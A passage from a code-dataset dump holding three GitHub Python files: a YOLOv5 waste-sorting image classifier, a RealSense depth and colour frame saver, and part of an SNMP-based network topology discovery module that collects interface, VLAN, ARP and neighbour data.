"call"}, {"api_name": "pandas.DataFrame", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 369, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 344, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 371, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 382, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 385, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 371, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 389, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 404, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 413, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 418, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 420, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 423, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 413, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 427, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft2", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 429, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftshift", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 431, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 435, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 438, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 442, "usage_type": "attribute"}, {"api_name": "skimage.metrics.structural_similarity", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 442, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 456, "usage_type": "attribute"}, {"api_name": "skimage.metrics.peak_signal_noise_ratio", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 456, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 463, "usage_type": "attribute"}, {"api_name": "skimage.metrics.normalized_mutual_information", "line_number": 468, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 471, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 463, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 473, "usage_type": "attribute"}, {"api_name": "skimage.metrics.mean_squared_error", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 473, "usage_type": "attribute"}]} +{"seq_id": "32054173099", "text": "import yolov5\nclass ImageProcessor:\n def __init__(self):\n self.model = yolov5.load('./best.pt')\n # set model parameters\n self.model.conf = 0.25 # NMS confidence threshold\n self.model.iou = 0.45 # NMS IoU threshold\n self.model.agnostic = False # NMS class-agnostic\n self.model.multi_label = False # NMS multiple labels per box\n self.model.max_det = 100 # maximum number of detections per image\n self.model.names = ['Compost (Biodegradable)',\n 'Recycle (cardboard)',\n 'Recycle (glass)',\n 'Recycle (metal)',\n 'Recycle (paper)',\n 'Recycle (plastic)']\n\n def process_image(self, img):\n\n # perform inference\n #results = model(img, size=640)\n\n # inference with test time augmentation\n results = self.model(img, size=640, augment=True)\n\n # parse results\n predictions = results.pred[0]\n boxes = predictions[:, :4] # x1, y1, x2, y2\n scores = predictions[:, 4]\n categories = predictions[:, 5]\n labels = ['biodegradable', 'cardboard', 'glass', 'metal', 'paper', 'plastic']\n\n print(labels[int(categories[0])])\n results.print()\n\n # show detection bounding boxes on image\n\n # save results into \"results/\" folder\n results.save(save_dir='results/')\n\n", "repo_name": "kofu145/BananaServer", "sub_path": "imageprocessor.py", "file_name": "imageprocessor.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yolov5.load", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "428488789", "text": "# 原文链接:https://blog.csdn.net/github_29705847/article/details/102938736\nimport pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\nclass realsense_im(object):\n def __init__(self, image_size=(640, 480)):\n self.pipeline = rs.pipeline()\n config = rs.config()\n config.enable_stream(\n rs.stream.depth, image_size[0], image_size[1], rs.format.z16, 30)\n config.enable_stream(\n rs.stream.color, image_size[0], image_size[1], rs.format.bgr8, 30)\n config.enable_stream(\n rs.stream.infrared, 1, image_size[0], image_size[1], rs.format.y8, 30)\n self.profile = self.pipeline.start(config)\n\n def __get_depth_scale(self):\n depth_sensor = self.profile.get_device().first_depth_sensor()\n\n depth_scale = depth_sensor.get_depth_scale()\n\n return depth_scale\n\n def get_image(self, with_ir=False):\n frames = self.pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n\n depth_image = np.asarray(depth_frame.get_data(), dtype=np.float32)\n color_image = np.asarray(color_frame.get_data(), dtype=np.uint8)\n color_image_pad = np.pad(\n color_image, ((20, 0), (0, 0), (0, 0)), \"edge\")\n depth_map_end = depth_image * self.__get_depth_scale() * 1000\n\n if with_ir:\n ir_frame = frames.get_infrared_frame(1)\n # ir_image = np.asarray(ir_frame.get_data(), dtype=np.float32)\n ir_image = np.asanyarray(ir_frame.get_data())\n return depth_map_end, color_image, ir_image\n else:\n return depth_map_end, color_image, None\n\n def process_end(self):\n self.pipeline.stop()\n\n\nrs_t = realsense_im()\n\ni = 0\ntry:\n while True:\n with_ir = True\n depth_map, rgb_map, ir_map = rs_t.get_image(with_ir=with_ir)\n save_file_img = './examples/savefig/rgb/image_r_{}.png'.format(\n str(i).zfill(5))\n cv2.imwrite(save_file_img, rgb_map)\n i += 1\n\n save_file_depth = './examples/savefig/depth/Tbimage_d_{}.png'.format(\n str(i).zfill(5))\n cv2.imwrite(save_file_depth, np.asarray(depth_map, np.uint16))\n print('save_file_img:', save_file_img,\n 'save_file_depth:', save_file_depth)\n if ir_map is not None:\n # im_show = np.hstack((depth_map, ir_map))\n im_show = ir_map\n else:\n im_show = depth_map\n\n cv2.namedWindow('RGB Example', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RGB and IR Example', im_show)\n key = cv2.waitKey(1)\n # Press esc or 'q' to close the image window\n if key & 0xFF == ord('q') or key == 27:\n cv2.destroyAllWindows()\n break\n\nfinally:\n rs_t.process_end()\n", "repo_name": "ViktorLiang/GW-Depth", "sub_path": "depth_interpolation/depth_img_save.py", "file_name": "depth_img_save.py", "file_ext": "py", "file_size_in_byte": 2800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyrealsense2.pipeline", "line_number": 9, "usage_type": "call"}, {"api_name": "pyrealsense2.config", "line_number": 10, "usage_type": "call"}, {"api_name": "pyrealsense2.stream", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyrealsense2.format", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyrealsense2.stream", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyrealsense2.format", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyrealsense2.stream", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pyrealsense2.format", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.pad", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.asanyarray", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.WINDOW_AUTOSIZE", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "29352840219", "text": "# -*- coding: utf-8 -*-\n# vim: noai:et:tw=80:ts=4:ss=4:sts=4:sw=4:ft=python\n\n\"\"\"\n node.py\n\"\"\"\nfrom about_time import about_time\nfrom alive_progress import alive_bar, config_handler\nimport binascii\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom pysnmp.smi.rfc1902 import ObjectIdentity\nimport re\nfrom sysdescrparser import sysdescrparser\nfrom typing import Union, List, Any\n# Nettopo Imports\nfrom nettopo.core.constants import (\n DCODE,\n NODE,\n NOTHING,\n RESERVED_VLANS,\n retcode_type_map,\n node_type_map,\n mac_type_map,\n bridge_status_map,\n stp_state_map,\n entphyclass_type_map,\n int_oper_status_map,\n int_type_map,\n int_admin_status_map,\n)\nfrom nettopo.core.data import (\n BaseData,\n DataTable,\n LinkData,\n VssData,\n VssMemberData,\n StackData,\n StackMemberData,\n EntData,\n VPCData,\n SVIData,\n LoopBackData,\n VLANData,\n ARPData,\n MACData,\n InterfaceData,\n)\nfrom nettopo.core.exceptions import NettopoSNMPError, NettopoNodeError\nfrom nettopo.core.snmp import SNMP\nfrom nettopo.core.util import (\n timethis,\n bits_from_mask,\n normalize_host,\n normalize_port,\n ip_2_str,\n ip_from_cidr,\n format_ios_ver,\n mac_hex_to_ascii,\n parse_allowed_vlans,\n lookup_table,\n is_ipv4_address,\n return_pretty_val,\n return_snmptype_val,\n bits_2_megabytes,\n get_oid_index,\n oid_endswith,\n)\nfrom nettopo.oids import Oids, CiscoOids, GeneralOids\n\n# Typing shortcuts\n_ULSIN = Union[list, str, int, None]\n_UIS = Union[int, str]\n_USN = Union[str, None]\n_UISO = Union[int, str, ObjectIdentity]\n_UAN = Union[Any, None]\n_ULN = Union[list, None]\n_UEN = Union[EntData, None]\n\n# Easy access to our OIDs\no = Oids()\ng = GeneralOids()\nc = CiscoOids()\n# Global defaults for alive-progress bar\nconfig_handler.set_global(theme='smooth')\n\n\nclass Node(BaseData):\n def __init__(self, ip: str, immediate_query: bool=False, **kwargs) -> None:\n self.ip = ip\n self.snmp = SNMP(self.ip, **kwargs)\n self.queried = False\n self.show_items = ['name', 'ip', 'plat', 'ios', 'serial',\n 'router', 'vss', 'stack']\n self.name = None\n self.descr = None\n self.os = None\n self.model = None\n self.vendor = None\n self.version = None\n self.ips = None\n self.router = False\n self.ospf = None\n self.ospf_id = None\n self.bgp_las = None\n self.hsrp_pri = None\n self.hsrp_vip = None\n self.stack = None\n self.vss = None\n self.serial = None\n self.svis = None\n self.vlans = None\n self.loopbacks = None\n self.bootfile = None\n self.ent = None\n self.vpc = None\n self.interfaces = None\n self.if_table = None\n self.ip_table = None\n self.arp_table = None\n self.mac_table = None\n self.cdp = None\n self.lldp = None\n self.links = []\n if immediate_query:\n self.query_node()\n\n @staticmethod\n def _has_value(thing: Any) -> bool:\n if not hasattr(thing, 'value'):\n return False\n elif thing.value in [o.ERR, o.ERR_INST, '0', '']:\n return False\n else:\n return True\n\n @staticmethod\n def _link_ios(ios, link: LinkData) -> LinkData:\n if ios.startswith('0x'):\n try:\n ios = binascii.unhexlify(ios[2:])\n except:\n pass\n if isinstance(ios, bytes):\n ios = ios.decode('utf-8')\n link.remote_desc = ios\n try:\n sys = sysdescrparser(ios)\n link.remote_os = sys.os\n link.remote_model = sys.model\n link.remote_vendor = sys.vendor\n link.remote_version = sys.version\n except:\n pass\n link.remote_ios = format_ios_ver(ios)\n return link\n\n def use_vlan_community(self, vlan: _UIS) -> _USN:\n original_community = self.snmp.community\n community = f\"{original_community}@{str(vlan)}\"\n if self.snmp.check_community(community):\n return original_community\n else:\n raise NettopoSNMPError(f\"ERROR: {community} failed {self.ip}\")\n\n def snmp_get(self, item: _UISO, is_bulk: bool=False,\n vlan: _UIS=None) -> _UAN:\n results = None\n error = False\n if vlan:\n old_community = self.use_vlan_community(vlan)\n try:\n if is_bulk:\n results = self.snmp.get_bulk(item)\n else:\n results = self.snmp.get_val(item)\n except Exception as e:\n error = e\n finally:\n if vlan:\n self.snmp.community = old_community\n if error:\n return error\n return results\n\n def query_node(self) -> None:\n \"\"\" Query this node with option to reset\n \"\"\"\n if self.queried:\n print(f\"{self.name} has already been queried.\")\n return\n with alive_bar(title='Node Query') as bar:\n self.queried = True\n snmp_name = self.snmp_get(o.SYSNAME)\n if self._has_value(snmp_name):\n self.name = normalize_host(\n snmp_name.value,\n self.snmp.config.host_domains,\n )\n bar()\n # Description\n snmp_descr = self.snmp_get(o.SYSDESC)\n if self._has_value(snmp_descr):\n self.descr = snmp_descr.value\n sys = sysdescrparser(snmp_descr.value)\n self.os = sys.os\n self.model = sys.model\n self.vendor = sys.vendor\n self.version = sys.version\n bar()\n # Interfaces\n self.interfaces = self.build_interface_table()\n bar()\n # IPs\n self.ips = self.get_ips()\n bar()\n # Vlans\n self.vlans = self.get_vlans()\n bar()\n # SVIs\n self.svis = self.get_svis()\n bar()\n # loopback\n self.loopbacks = self.get_loopbacks()\n bar()\n # bootfile\n bootfile = self.snmp_get(o.SYS_BOOT)\n if self._has_value(bootfile):\n self.bootfile = bootfile.value\n bar()\n # Ent chassis info (serial, ios, platform)\n self.ent = self.get_ent()\n bar()\n # stack\n self.stack = self.get_stack()\n bar()\n # vss\n self.vss = self.get_vss()\n bar()\n # serial\n if self.vss:\n if self.vss.enabled and self.vss.serial:\n self.serial = self.vss.serial\n else:\n serial = self.snmp_get(o.SYS_SERIAL)\n if self._has_value(serial):\n self.serial = serial.value\n bar()\n # VPC peerlink polulates self.vpc\n self.vpc = self.get_vpc()\n bar()\n # Populates self.arp_table\n self.arp_table = self.get_arp()\n bar()\n # Populates self.mac_table\n self.mac_table = self.get_cam()\n bar()\n # CDP neighbors\n self.cdp = self.get_cdp()\n bar()\n # LLDP neighbors\n self.lldp = self.get_lldp()\n bar()\n self.links = self.create_links()\n bar()\n # Routing\n snmp_router = self.snmp_get(o.IP_ROUTING)\n if self._has_value(snmp_router) and snmp_router.value == '1':\n self.router = True\n bar()\n if self.router:\n # OSPF\n snmp_ospf = self.snmp_get(o.OSPF)\n if self._has_value(snmp_ospf):\n self.ospf = snmp_ospf.value\n bar()\n snmp_ospf_id = self.snmp_get(o.OSPF_ID)\n if self._has_value(snmp_ospf_id):\n self.ospf_id = snmp_ospf_id.value\n bar()\n # BGP\n bgp_las = self.snmp_get(o.BGP_LAS)\n if self._has_value(bgp_las) and bgp_las.value != '0':\n # 4500x reports 0 as disabled\n self.bgp_las = bgp_las.value\n bar()\n # HSRP\n snmp_hsrp_pri = self.snmp_get(o.HSRP_PRI)\n if self._has_value(snmp_hsrp_pri):\n self.hsrp_pri = snmp_hsrp_pri.value\n bar()\n snmp_hsrp_vip = self.snmp_get(o.HSRP_VIP)\n if self._has_value(snmp_hsrp_vip):\n self.hsrp_vip = snmp_hsrp_vip.value\n bar()\n\n def create_links(self) -> List[LinkData]:\n # Combine CDP and LLDP to create links\n links = self.cdp.copy()\n for cdp in links:\n for lldp in self.lldp:\n if cdp.is_same_link(lldp):\n # Remove CDP\n links.remove(cdp)\n # Injest lldp\n cdp.injest_link(lldp)\n # Add CDP back\n links.append(cdp)\n # Add LLDP\n for lldp in self.lldp:\n if lldp.local_port not in [l.local_port for l in links]:\n links.append(lldp)\n return links\n\n def find_interface(self, item: _UIS, name: str=None) -> InterfaceData:\n if not name:\n if isinstance(item, int):\n name = 'idx'\n elif isinstance(item, str):\n name = 'name'\n for entry in self.interfaces:\n if item == getattr(entry, name):\n return entry\n\n def get_cidr_from_oid(self, oid: str) -> str:\n ip = \".\".join(oid.split('.')[-4:])\n if is_ipv4_address(ip):\n mask = self.snmp_get(f\"{o.IF_IP_NETM}.{ip}\")\n if self._has_value(mask):\n mbits = bits_from_mask(mask.value)\n return f\"{ip}/{mbits}\"\n else:\n return f\"{ip}/32\"\n\n def lookup_ifname_index(self, idx: int,\n normalize: bool=False) -> _USN:\n ifname = self.snmp_get(f\"{o.IFNAME}.{idx}\")\n if not self._has_value(ifname):\n ifindex = self.snmp_get(f\"{o.IFINDEX}.{idx}\")\n if self._has_value(ifindex):\n ifname = self.snmp_get(f\"{o.IFNAME}.{ifindex.value}\")\n if self._has_value(ifname):\n if normalize:\n return normalize_port(ifname.value)\n else:\n return ifname.value\n\n def get_ifname_index(self, idx: int,\n normalize: bool=True) -> _USN:\n # Look in interfaces first\n if self.interfaces:\n interface = self.find_interface(idx, 'idx')\n if interface:\n return interface.name\n else:\n return self.lookup_ifname_index(idx=idx, normalize=normalize)\n\n def lookup_cidr_index(self, idx: int) -> _ULN:\n \"\"\"\n # From IP-MIB\n ipAdEntTable = \"1.3.6.1.2.1.4.20.1\"\n ipAdEntAddr = \"1.3.6.1.2.1.4.20.1.1\"\n ipAdEntIfIndex = \"1.3.6.1.2.1.4.20.1.2\"\n ipAdEntNetMask = \"1.3.6.1.2.1.4.20.1.3\"\n \"\"\"\n cidrs = []\n if not self.ip_table:\n # Ip table\n self.ip_table = self.snmp_get(g.ipAdEntTable, is_bulk=True)\n ip_entries = self.ip_table.search(g.ipAdEntIfIndex)\n for ip_oid, ip_idx in ip_entries.items():\n if int(ip_idx) == idx:\n ip = \".\".join(ip_oid.split('.')[-4:])\n if is_ipv4_address(ip):\n mask = self.ip_table.table.get(f\"{g.ipAdEntNetMask}.{ip}\",\n None)\n if mask:\n subnet_mask = bits_from_mask(mask)\n cidrs.append(f\"{ip}/{subnet_mask}\")\n else:\n cidrs.append(f\"{ip}/32\")\n return cidrs\n\n def build_interface_table(self) -> List[InterfaceData]:\n \"\"\"\n # From IF-MIB\n ifTable = \"1.3.6.1.2.1.2.2\"\n ifEntry = \"1.3.6.1.2.1.2.2.1\"\n ifIndex = \"1.3.6.1.2.1.2.2.1.1\"\n ifDescr = \"1.3.6.1.2.1.2.2.1.2\"\n ifType = \"1.3.6.1.2.1.2.2.1.3\"\n ifMtu = \"1.3.6.1.2.1.2.2.1.4\"\n ifSpeed = \"1.3.6.1.2.1.2.2.1.5\"\n ifPhysAddress = \"1.3.6.1.2.1.2.2.1.6\"\n ifAdminStatus = \"1.3.6.1.2.1.2.2.1.7\"\n ifOperStatus = \"1.3.6.1.2.1.2.2.1.8\"\n indexed_table = [\n ('1.3.6.1.2.1.2.2.1.1.3', '3'),\n ('1.3.6.1.2.1.2.2.1.2.3', 'GigabitEthernet1/0/1'),\n ('1.3.6.1.2.1.2.2.1.3.3', '6'),\n ('1.3.6.1.2.1.2.2.1.4.3', '9000'),\n ('1.3.6.1.2.1.2.2.1.5.3', '1000000000'),\n ('1.3.6.1.2.1.2.2.1.6.3', '0x88908d1b1781'),\n ('1.3.6.1.2.1.2.2.1.7.3', '1'),\n ('1.3.6.1.2.1.2.2.1.8.3', '1'),\n ('1.3.6.1.2.1.2.2.1.9.3', '6773'),\n ('1.3.6.1.2.1.2.2.1.10.3', '3428545753'),\n ('1.3.6.1.2.1.2.2.1.11.3', '12200292'),\n ('1.3.6.1.2.1.2.2.1.13.3', '0'),\n ('1.3.6.1.2.1.2.2.1.14.3', '0'),\n ('1.3.6.1.2.1.2.2.1.15.3', '0'),\n ('1.3.6.1.2.1.2.2.1.16.3', '528472411'),\n ('1.3.6.1.2.1.2.2.1.17.3', '14091342'),\n ('1.3.6.1.2.1.2.2.1.19.3', '0'),\n ('1.3.6.1.2.1.2.2.1.20.3', '0')\n ]\n \"\"\"\n interfaces = []\n if not self.if_table:\n # If table\n self.if_table = self.snmp_get(g.ifTable, is_bulk=True)\n if_entries = self.if_table.search(\n g.ifIndex,\n return_type='val',\n )\n for if_entry in if_entries:\n idx = int(if_entry)\n idx_table = self.if_table.index_table(idx)\n if_name = idx_table.get(f\"{g.ifDescr}.{idx}\")\n # Skip unrouted VLAN ports and Stack ports\n if if_name.startswith(('unrouted', 'Null', 'Stack')):\n continue\n if_mac = idx_table.get(f\"{g.ifPhysAddress}.{idx}\")\n mac = mac_hex_to_ascii(if_mac)\n # Skip interfaces we do not have a MAC.\n # Such as previously stacked switches.\n if mac == '0000.0000.0000':\n continue\n # We have an interface let's build\n interface = InterfaceData()\n interface.idx = idx\n interface.name = normalize_port(if_name)\n interface.mac = mac\n interface.cidrs = self.lookup_cidr_index(idx)\n if_type = idx_table.get(f\"{g.ifType}.{idx}\")\n interface.media = int_type_map.get(int(if_type))\n if_admin_status = idx_table.get(f\"{g.ifAdminStatus}.{idx}\")\n interface.admin_status = int_admin_status_map.get(int(if_admin_status))\n if_oper_status = idx_table.get(f\"{g.ifOperStatus}.{idx}\")\n interface.oper_status = int_oper_status_map.get(int(if_oper_status))\n interfaces.append(interface)\n return interfaces\n\n def get_ips(self) -> list:\n \"\"\" Collects and stores all the IPs for Node\n returns - list of IPs\n \"\"\"\n ips = []\n for entry in self.interfaces:\n if entry.cidrs:\n ips.extend([cidr.split('/')[0] for cidr in entry.cidrs])\n ips.sort()\n return ips\n\n def get_ent_from_index(self, idx: int):\n snmp_serial = self.snmp_get(f\"{o.ENTPHYENTRY_SERIAL}.{idx}\")\n serial = snmp_serial.value if self._has_value(snmp_serial) else None\n snmp_plat = self.snmp_get(f\"{o.ENTPHYENTRY_PLAT}.{idx}\")\n plat = snmp_plat.value if self._has_value(snmp_plat) else None\n snmp_ios = self.snmp_get(f\"{o.ENTPHYENTRY_SOFTWARE}.{idx}\")\n ios = snmp_ios.value if self._has_value(snmp_ios) else None\n return serial, plat, ios\n\n def build_ent_from_oid(self, oid, ent_snmp) -> _UEN:\n idx = get_oid_index(oid, 12)\n serial, plat, ios = self.get_ent_from_index(idx)\n # Modular switches have IOS on module\n if not ios:\n # Search modules '9'\n mod_oids = ent_snmp.search('9', item_type='val',\n return_type='oid')\n if mod_oids:\n for mod_oid in mod_oids:\n mod_idx = get_oid_index(mod_oid, 12)\n mod_ios = self.snmp_get(f\"{o.ENTPHYENTRY_SOFTWARE}.{mod_idx}\")\n if self._has_value(mod_ios):\n ios = mod_ios.value\n break\n ios = format_ios_ver(ios)\n if all([serial, plat, ios]):\n return EntData(serial, plat, ios)\n\n def get_ent(self) -> _UEN:\n # TODO: IOS is incorrect for IOS-XE at least.\n ent_snmp = self.snmp_get(o.ENTPHYENTRY_CLASS, is_bulk=True)\n # Search chassis '3'\n chs_oids = ent_snmp.search('3', item_type='val', return_type='oid')\n if chs_oids:\n for chs_oid in chs_oids:\n ent = self.build_ent_from_oid(chs_oid, ent_snmp)\n if ent:\n return ent\n\n def get_loopbacks(self) -> List[InterfaceData]:\n return [entry for entry in self.interfaces \\\n if entry.media == 'softwareLoopback']\n\n def get_svis(self) -> List[SVIData]:\n svis = []\n svi_table = self.snmp_get(o.SVI_VLANIF, is_bulk=True)\n for oid, val in svi_table.table.items():\n vlan = get_oid_index(oid, 14)\n svi = SVIData(vlan)\n interface = self.find_interface(int(val), 'idx')\n if interface:\n svi.ips = interface.cidrs\n svis.append(svi)\n return svis\n\n def get_vlans(self) -> List[VLANData]:\n vlans = []\n vlan_table = self.snmp_get(o.VLANS_NEW, is_bulk=True)\n for oid, name in vlan_table.table.items():\n # get VLAN ID from OID\n vid = get_oid_index(oid)\n if vid not in RESERVED_VLANS:\n vlans.append(VLANData(vid, name))\n return vlans\n\n def get_stack(self)-> StackData:\n stack_roles = ['master', 'member', 'notMember', 'standby']\n stack = StackData()\n stack_snmp = self.snmp_get(o.STACK, is_bulk=True)\n for oid, val in stack_snmp.table.items():\n if oid.startswith(f\"{o.STACK_NUM}.\"):\n idx = get_oid_index(oid, 14)\n mem = StackMemberData()\n mem.num = int(val)\n role_num = stack_snmp.table.get(f\"{o.STACK_ROLE}.{idx}\", \"\")\n for role in enumerate(stack_roles, start=1):\n if int(role_num) == role[0]:\n mem.role = role[1]\n if mem.role and mem.role != 'notMember':\n mem.pri = stack_snmp.table.get(f\"{o.STACK_PRI}.{idx}\", \"\")\n mem.img = stack_snmp.table.get(f\"{o.STACK_IMG}.{idx}\", \"\")\n mem.serial, mem.plat, mem.ios = self.get_ent_from_index(idx)\n mac = stack_snmp.table.get(f\"{o.STACK_MAC}.{idx}\", \"\")\n if mac:\n mem.mac = mac_hex_to_ascii(mac)\n stack.members.append(mem)\n if len(stack.members) > 1:\n stack.enabled = True\n stack.count = len(stack.members)\n return stack\n\n def get_vss(self) -> VssData:\n vss_snmp = self.snmp_get(o.VSS, is_bulk=True)\n if not vss_snmp.table:\n return\n vss_mode = vss_snmp.table.get(o.VSS_MODE, \"\")\n if vss_mode == '2':\n vss = VssData()\n vss.enabled = True\n vss.domain = vss_snmp.table.get(o.VSS_DOMAIN, \"\")\n chassis = 0\n vss_mod_snmp = self.snmp_get(o.VSS_MODULES, is_bulk=True)\n vss_mods = vss_mod_snmp.search('1', item_type='val')\n if vss_mods:\n for _oid, _val in vss_mods.items():\n modidx = get_oid_index(_oid, 14)\n # we want only chassis - line card module have no software\n serial, plat, ios = self.get_ent_from_index(modidx)\n if ios:\n member = VssMemberData()\n member.ios = ios\n member.plat = plat\n member.serial = serial\n vss.members.append(member)\n chassis += 1\n if chassis > 1:\n break\n return vss\n\n def get_vpc(self) -> Union[VPCData, None]:\n \"\"\" If VPC is enabled,\n Return the VPC domain and interface name of the VPC peerlink.\n \"\"\"\n vpc_table = self.snmp_get(o.VPC_PEERLINK_IF, is_bulk=True)\n if vpc_table.table:\n for oid, val in vpc_table.table.items():\n vpc = VPCData()\n vpc.domain = get_oid_index(oid)\n vpc.ifname = self.get_ifname_index(int(val))\n return vpc\n\n def get_arp(self) -> List[ARPData]:\n \"\"\"\n {'1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.1': '0x88908d1b17d6',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.10': '0x843497a26eee',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.105': '0x0026552a2b10',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.106': '0x78e7d18f87bc',\n '1.3.6.1.2.1.3.1.1.2.45.1.10.0.20.112': '0x843dc69858d6',\n '1.3.6.1.2.1.3.1.1.2.46.1.10.0.21.1': '0x88908d1b17e8',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.1': '0x88908d1b17c4',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.20': '0x1803731622e1',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.113': '0x843dc69858da',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.220': '0x000c29b53a59',\n '1.3.6.1.2.1.3.1.1.2.47.1.10.0.23.246': '0x84b51708b63e',\n '1.3.6.1.2.1.3.1.1.2.48.1.10.0.24.1': '0x88908d1b17c1',\n '1.3.6.1.2.1.3.1.1.2.49.1.10.0.25.1': '0x88908d1b17f1',\n '1.3.6.1.2.1.3.1.1.2.50.1.10.0.26.1': '0x88908d1b17e5',\n '1.3.6.1.2.1.3.1.1.2.51.1.10.0.27.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.52.1.10.0.28.1': '0x88908d1b17d9',\n '1.3.6.1.2.1.3.1.1.2.53.1.10.0.29.1': '0x88908d1b17e8',\n '1.3.6.1.2.1.3.1.1.2.54.1.10.0.30.1': '0x88908d1b17e5',\n '1.3.6.1.2.1.3.1.1.2.55.1.10.0.0.1': '0x88908d1b17d1',\n '1.3.6.1.2.1.3.1.1.2.55.1.10.0.0.2': '0x28940fe5fac1',\n '1.3.6.1.2.1.3.1.1.2.55.1.10.0.0.5': '0x001c7f707f0f',\n '1.3.6.1.2.1.3.1.1.2.56.1.172.16.1.1': '0x88908d1b17c1',\n '1.3.6.1.2.1.3.1.1.2.57.1.172.16.2.1': '0x88908d1b17cd',\n '1.3.6.1.2.1.3.1.1.2.58.1.172.16.3.1': '0x88908d1b17dd',\n '1.3.6.1.2.1.3.1.1.2.59.1.10.10.0.1': '0x88908d1b17e9',\n '1.3.6.1.2.1.3.1.1.2.60.1.10.20.0.1': '0x88908d1b17f9',\n '1.3.6.1.2.1.3.1.1.2.61.1.172.16.10.1': '0x88908d1b17cd',\n '1.3.6.1.2.1.3.1.1.2.65.1.10.0.31.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.66.1.10.0.32.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.67.1.10.0.33.1': '0x88908d1b17c5',\n '1.3.6.1.2.1.3.1.1.2.71.1.10.0.11.1': '0x88908d1b17d4',\n '1.3.6.1.2.1.3.1.1.2.72.1.10.0.37.1': '0x88908d1b17c5',\n '1.3.6.1.2.1.3.1.1.2.75.1.10.0.34.1': '0x88908d1b17c9',\n '1.3.6.1.2.1.3.1.1.2.76.1.10.0.35.1': '0x88908d1b17d9',\n '1.3.6.1.2.1.3.1.1.2.77.1.10.0.36.1': '0x88908d1b17d5',\n '1.3.6.1.2.1.3.1.1.2.115.1.10.0.124.1': '0x88908d1b17c0',\n '1.3.6.1.2.1.3.1.1.2.116.1.10.0.125.1': '0x88908d1b17f2',\n '1.3.6.1.2.1.3.1.1.2.117.1.10.0.126.1': '0x88908d1b17ec',\n 